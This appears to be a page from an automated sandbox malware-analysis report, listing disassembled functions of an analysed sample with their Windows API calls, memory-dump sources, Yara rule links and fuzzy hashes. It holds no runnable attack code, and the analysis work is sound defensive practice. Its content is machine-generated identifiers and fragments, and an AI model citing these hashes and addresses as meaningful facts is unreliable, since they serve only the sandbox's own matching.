                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1597257046-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 89f1a50a5f3f04ab4eb1e3bf6fc47514f3819a61a53c7cc8dd854e7388be254d
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89f1a50a5f3f04ab4eb1e3bf6fc47514f3819a61a53c7cc8dd854e7388be254d
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004555D6 Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: DeleteDestroyObject$IconWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3349847261-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044B600 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                                                                                                                                                                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                                                                                                                                                                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2223660684-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00447268 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                                                                                                                                                                                                                                                                                                                                                                                                                • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                                                                                                                                                                                                                                                                                                                                                                                                                • EndPath.GDI32(?), ref: 004472B0
                                                                                                                                                                                                                                                                                                                                                                                                                • StrokePath.GDI32(?), ref: 004472BE
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2783949968-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00417D0E Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd.LIBCMT ref: 00417D1A
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd.LIBCMT ref: 00417D31
                                                                                                                                                                                                                                                                                                                                                                                                                • __amsg_exit.LIBCMT ref: 00417D3F
                                                                                                                                                                                                                                                                                                                                                                                                                • __lock.LIBCMT ref: 00417D4F
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3521780317-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00471144 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00471144
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 0047114D
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 0047117B
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00471102 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00471102
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 0047110B
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00471139
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004389A1 Relevance: 6.0, APIs: 4, Instructions: 27threadwindowtimeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004390C2 Relevance: 6.0, APIs: 4, Instructions: 26synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                                                                                                                                                                                                                                                                                                                                                                                                                • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 146765662-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0041405D Relevance: 6.0, APIs: 4, Instructions: 19threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd_noexit.LIBCMT ref: 00414080
                                                                                                                                                                                                                                                                                                                                                                                                                • __freeptd.LIBCMT ref: 0041408A
                                                                                                                                                                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 00414093
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3182216644-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046EDC6 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 383COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: BuffCharLower
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: $8'I
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2358735015-3608026889
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
